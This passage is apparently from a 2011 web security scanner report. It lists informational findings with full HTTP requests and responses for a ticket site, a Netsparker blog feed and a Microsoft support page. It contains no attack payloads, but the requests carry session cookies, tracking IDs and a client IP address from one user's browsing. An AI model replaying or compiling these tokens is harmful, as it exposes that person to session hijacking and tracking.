Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420; POOLID=B; _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4AzAqqNBjoLb2Zmc2V0af6QnQ%3D%3D--a2496e9fd1e9391aea4b68370610eb89644e9f7c

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 17
ETag: "66e5bc47844c8a9a8f4405e1be2b44aa"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _fancat_session=BAh7EToPc2Vzc2lvbl9pZCIlMDI1MmFjN2M0ZGIyMTBkYmI3YmRhYjkzMDRjZGFhZWM6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGn8vH6x0ToSYmdfdmlzaXRvcl9pZEkiFTEzNDI1NjY4MzAyNzU1ODUGOwdGOhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXLaG4APrNmOBjoLb2Zmc2V0af6QnQ%3D%3D--34da2ef4767eda18da1f16470dc614e78b069b8d; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 11597
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
<img alt='imgtrkp' height='1' src='/la/pi?m=_uid%3D-776896836%3A1342566830275585%3Apgscheckout%7C%252Fcheckout%252Findex%252F418563179%26_ctx%3D%26_ts%3D1311100545%26_st%3D%26_ma%3D13%26_ref%3D' width='1' />
</body>
</html>

18.3. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bing.fansnap.com
Path:   /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Request 1

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/events/search?q=U2+with+Interpol+(rescheduled+from+7%2f19)&p1=[Events%20source=%22vertical%22+qzeventid=%22f389669%22]&FORM=DTPEVE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420
If-None-Match: "1237402bfa716d1b23edce2a34ba2262"

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 424
ETag: "13894ec26df92ffcfe8a7d45e8580ead"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23596
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
var fsurl = document.URL;
if (fsurl.indexOf('?') == -1) {
fsurl += "?mt=sta&sl=true";
} else {
fsurl += "&mt=sta&sl=true";
}

var uetParams = escape("_uid=365762337:9841:pgstickets&_ctx=mt:int;sz:1732;id:389669&_cnt=6&_st=&_tag=mt:int;sz:1732;id:389669&ts=" + new Date().getTime() + "&slLink=true");
var imgTag = '<img src="/la/seats-uet?m='+uetParams+'" height="1px" width="1px" style="position:absolute;"/>';

document.getElementById("sl-pi").innerHTML = imgTag;
var pageNotLoadingDom = document.getElementById("page-not-loading");
if(pageNotLoadingDom){
pageNotLoadingDom.innerHTML = '<div id="page-not-loading-cont">Page not loading?' + ' <a href="' + fsurl + '" rel="nofollow">Click here</a></div>';
}
},"15000");
//]]>
</script>

<div id='sl-pi'></div>

<div id='map-wrapper'>

<div id='mapLoaderMod' style='display:none;'>
<div class='mapLoaderModCont'>
Loading your tickets...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
</div>
<div id='fansnap-map-logo'></div>

<div class='zoom-hldr'>
<div id='zoom-ctrl'>
<div class='ui-slider-zoom' id='zoom-level-slider'></div>
<div id='pan-tool'>
<a href="javascript:void(0)" id="pan-top">pan top</a>
<a href="javascript:void(0)" id="pan-right">pan right</a>
<a href="javascript:void(0)" id="pan-btm">pan bottom</a>
<a href="javascript:void(0)" id="pan-left">pan left</a>
<a href="javascript:void(0)" id="pan-reset">pan reset</a>
</div>
<div id='zoom-tool'>
<a href="javascript:void(0)" id="zoom-in">zoom in</a>
<div class='zoom-level row' id='zoom-level-1'>ROW</div>
<div class='zoom-level' id='zoom-level-2'></div>
<div class='zoom-level' id='zoom-level-3'></div>
<div class='zoom-level venue' id='zoom-level-4'>VENUE</div>
<a href="javascript:void(0)" id="zoom-out">zoom out</a>
</div>
</div>

</div>
<div class='dynamic-filter-bar' id='filters'>
<form action='' id='formFilter'>
<div class='filters-seats'>
<label class='inlinelabel'>
# of Tickets
</label>
<select id="seat_count" name="seat_count"><option value="Any" selected="selected">Any</o
...[SNIP]...

Request 2

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:51 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 411
ETag: "b4954110e95cf96da99f9274cf255f3f"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104091; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:51 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleUkiAAY7B0Y6CmJnX2xwSSIBmWh0dHA6Ly9iaW5nLmZhbnNuYXAuY29tL3UyLXRpY2tldHMvdTItd2l0aC1pbnRlcnBvbC1yZXNjaGVkdWxlZC1mcm9tLTcxOS9qdWx5LTIwLTIwMTEtMzg5NjY5P3V0bV9zb3VyY2U9MTk4NyZhY2s9aHR0cCUzYSUyZiUyZnd3dy5iaW5nLmNvbSUyZnMlMmZhY2suaHRtbAY7B0Y6D2JnX3JlZmVyZXIiAZZodHRwOi8vd3d3LmJpbmcuY29tL2V2ZW50cy9zZWFyY2g%2FcT1VMit3aXRoK0ludGVycG9sKyhyZXNjaGVkdWxlZCtmcm9tKzclMmYxOSkmcDE9W0V2ZW50cyUyMHNvdXJjZT0lMjJ2ZXJ0aWNhbCUyMitxemV2ZW50aWQ9JTIyZjM4OTY2OSUyMl0mRk9STT1EVFBFVkU6EGJnX2tleXdvcmRzIi9VMit3aXRoK0ludGVycG9sKyhyZXNjaGVkdWxlZCtmcm9tKzclMmYxOSk6EGJnX3Zpc2l0X2lkaQS%2Bq5gxOhJiZ192aXNpdG9yX2lkIhUxMzQyNTY2ODMwMjc1NTg1OhFiZ19zdHlsZV9pZHNJIgAGOwdGOgtiZ19sb2N7CjoIbGF0ZhozMi43ODI0OTk5OTk5OTk5OTkAj1w6CGxuZ2YbLTk2LjgyMDcwMDAwMDAwMDAwMgD08ToQbWFya2V0X2FyZWFpEjoRZGlzcGxheV9uYW1lIhZEYWxsYXMtRm9ydCBXb3J0aDoUbWFfZGlzcGxheV9uYW1lQBE6EHNwdl9zcmNfNzAxVDoSbGFzdF9hY2Nlc3NlZEl1OglUaW1lDXPaG4BpmD6LBjoLb2Zmc2V0af6QnToRc3B2X3NyY18xOTg3VA%3D%3D--db8832195ff0cfef7c8624e2d3a18375249bc2c7; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23330
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...
var fsurl = document.URL;
if (fsurl.indexOf('?') == -1) {
fsurl += "?mt=sta&sl=true";
} else {
fsurl += "&mt=sta&sl=true";
}

var uetParams = escape("_uid=832089022:1482:pgstickets&_ctx=mt:int;sz:1732;id:389669&_cnt=6&_st=&_tag=mt:int;sz:1732;id:389669&ts=" + new Date().getTime() + "&slLink=true");
var imgTag = '<img src="/la/seats-uet?m='+uetParams+'" height="1px" width="1px" style="position:absolute;"/>';

document.getElementById("sl-pi").innerHTML = imgTag;
var pageNotLoadingDom = document.getElementById("page-not-loading");
if(pageNotLoadingDom){
pageNotLoadingDom.innerHTML = '<div id="page-not-loading-cont">Page not loading?' + ' <a href="' + fsurl + '" rel="nofollow">Click here</a></div>';
}
},"15000");
//]]>
</script>

<div id='sl-pi'></div>

<div id='map-wrapper'>

<div id='mapLoaderMod' style='display:none;'>
<div class='mapLoaderModCont'>
Loading your tickets...
<br />
<img alt="Loading-32-onwhite" src="http://cdn-3.f6img.com/REL-fansnap-1.20.2-r31787/images/loading-32-onwhite.gif?REL-fansnap-1.20.2-r31787" />
</div>
</div>
<div id='fansnap-map-logo'></div>

<div class='zoom-hldr'>
<div id='zoom-ctrl'>
<div class='ui-slider-zoom' id='zoom-level-slider'></div>
<div id='pan-tool'>
<a href="javascript:void(0)" id="pan-top">pan top</a>
<a href="javascript:void(0)" id="pan-right">pan right</a>
<a href="javascript:void(0)" id="pan-btm">pan bottom</a>
<a href="javascript:void(0)" id="pan-left">pan left</a>
<a href="javascript:void(0)" id="pan-reset">pan reset</a>
</div>
<div id='zoom-tool'>
<a href="javascript:void(0)" id="zoom-in">zoom in</a>
<div class='zoom-level row' id='zoom-level-1'>ROW</div>
<div class='zoom-level' id='zoom-level-2'></div>
<div class='zoom-level' id='zoom-level-3'></div>
<div class='zoom-level venue' id='zoom-level-4'>VENUE</div>
<a href="javascript:void(0)" id="zoom-out">zoom out</a>
</div>
</div>

</div>
<div class='dynamic-filter-bar' id='filters'>
<form action='' id='formFilter'>
<div class='filters-seats'>
<label class='inlinelabel'>
# of Tickets
</label>
<select id="seat_count" name="seat_count"><option value="Any" selected="selected">Any</o
...[SNIP]...

18.4. http://feeds.feedburner.com/netsparker  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://feeds.feedburner.com
Path:   /netsparker

Request 1

GET /netsparker HTTP/1.1
Host: feeds.feedburner.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mavitunasecurity.com/blog/

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
ETag: kkpPsFNF0Wuuzu/QLigKEGMUAaI
Last-Modified: Tue, 19 Jul 2011 15:41:14 GMT
Date: Tue, 19 Jul 2011 15:41:14 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 146403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Netsparker, Web Application Security Scanner - powered by FeedBurner</title>
<link href="http://feedburner.google.com/fb/lib/stylesheets/undohtml.css" rel="stylesheet" type="text/css" media="all">
<link href="http://feedburner.google.com/fb/feed-styles/bf30.css" rel="stylesheet" type="text/css" media="all">
<link rel="alternate" type="application/rss+xml" title="Netsparker, Web Application Security Scanner" href="http://feeds.feedburner.com/netsparker">
<script type="text/javascript" src="http://feedburner.google.com/fb/feed-styles/bf30.js"></script>
</head>
<body id="browserfriendly" onload="jsFeedUrl='http://feeds.feedburner.com/netsparker';loadSubscribeAreaUltra('standard');go_decoding()">
<div id="cometestme" style="display:none;">&amp;</div>
<div id="bodycontainer">
<div id="bannerblock">
<a href="http://www.mavitunasecurity.com/blog/" title="Link to original website"><img src="http://www.mavitunasecurity.com/s/d/i/feed-logo.png" id="feedimage" alt="Netsparker, Web Application Security Scanner"></a>
<h1>
<a href="http://www.mavitunasecurity.com/blog/" title="Link to original website">Netsparker, Web Application Security Scanner</a>
</h1>
<h2>syndicated content powered by FeedBurner</h2>
<p style="clear:both"></p>
</div>
<div id="bodyblock">
<div id="subscribenow" class="subscribeblock action">
<div id="subscribe-userchoice" style="display:none">
<p id="subscribeLink">
<a href="#">...</a>
</p>
<p id="resetLink">Reset this favorite; <a href="#" onclick="return clearUserchoice('standard')">show all Subscribe options</a>
</p>
</div>
<div id="subscribe-options">
<h3>Subscribe Now!</h3>
<h4>...with web-based news readers. Click your choice below:</h4>
<div id="webbased">
<a href="http://add.my.yahoo.com/rss?url=http://feeds.feedburner.com/netsparker" onclick="t
...[SNIP]...

Request 2

GET /netsparker HTTP/1.1
Host: feeds.feedburner.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Content-Type: text/xml; charset=UTF-8
ETag: y/yCDMzrU40KlsYnFkoxa4v+PFs
Last-Modified: Tue, 19 Jul 2011 15:26:55 GMT
Date: Tue, 19 Jul 2011 15:41:15 GMT
Expires: Tue, 19 Jul 2011 15:41:15 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 172951

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">
<channel>
<title>Netsparker, Web Application Security Scanner</title>
<link>http://www.mavitunasecurity.com/blog/</link>
<description>Netsparker, Web application security scanner's blog from Mavituna Security. </description>
<lastBuildDate>Tue, 24 May 2011 09:34:35 GMT</lastBuildDate>
<ttl>480</ttl>
<image>
<title>Netsparker, Web Application Security Scanner</title>
<link>http://www.mavitunasecurity.com/blog/</link>
<url>http://www.mavitunasecurity.com/s/d/i/feed-logo.png</url>
</image>
<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/netsparker" /><feedburner:info uri="netsparker" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
<title>False Positives - The Dirty Secret of the Web Security Scanning Industry</title>
<link>http://feedproxy.google.com/~r/netsparker/~3/psuqtJckSAQ/</link>
<guid isPermaLink="false">http://www.mavitunasecurity.com/blog/false-positives-the-dirty-secret-of-the-web-security-scanning-industry/</guid>
<author>Ferruh Mavituna</author>
<pubDate>Tue, 24 May 2011 09:34:35 GMT</pubDate>
<category>false-positive</category>
<category>web-app-scanners</category>
<category>industry</category>
<description>&lt;p&gt;&lt;img style="margin: 0px 10px 10px 0px; display: inline; float: left" align="left" src="http://www.mavitunasecurity.com/s/r/b_trust.jpg" width="335" height="252" /&gt;
...[SNIP]...

18.5. http://support.microsoft.com/contactus/cu_sc_prodact_master  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.microsoft.com
Path:   /contactus/cu_sc_prodact_master

Request 1

GET /contactus/cu_sc_prodact_master HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/cu_sc_prodact_master
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; wedcsinc=1; ST_GN_EN-US=5_0_0; fmsmemo=st=|13083|13701; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078475316:ss=1311077969178; sdninc=3; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.NumberOfVisits=1&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=h7GYQbp8zAEkAAAAYjRhYTU1M2MtNWZhZC00MTkxLWIwMjYtZjAzYjBjNjFkNWM4kVMZvo9G5bHj7F5QoTXJNIqBvRs1; fmshb=0,1311089278064

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:27:54 GMT
Content-Length: 40953

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="cu_sc_prodact_master" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln"
...[SNIP]...
<script type="text/javascript" src="/contactus/common/script/contactus.js?43"></script><script type="text/javascript" src="/contactus/common/script/alerts.js?43"></script><meta name="robots" content="" /><meta name="MS.LOCALE" content="en" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Help and Support</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/contactus/common/css/contactus.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>
<!-- RESG: 7/19/2011 8:27:54 AM - RESX: 1/1/0001 12:00:00 AM -->
<!-- (c) 2011 Microsoft Corporation. All Rights Reserved -->
<script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}


#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}


#gsfx_brnd_SiteHeaderImage
{
height:0px;
}



.gsfx_brnd_NetworkLink, .gsfx_brnd_NetworkLink:visited, .gsfx_brnd_NetworkLink a, .gsfx_brnd_NetworkLink a:visited
{
color: #FFFFFF;
}

.gsfx_brnd_NetworkLink:hover, .gsfx_brnd_NetworkLink:active, .gsfx_brnd_NetworkLink:focus,
.gsfx_brnd_N
...[SNIP]...

Request 2

GET /contactus/cu_sc_prodact_master HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
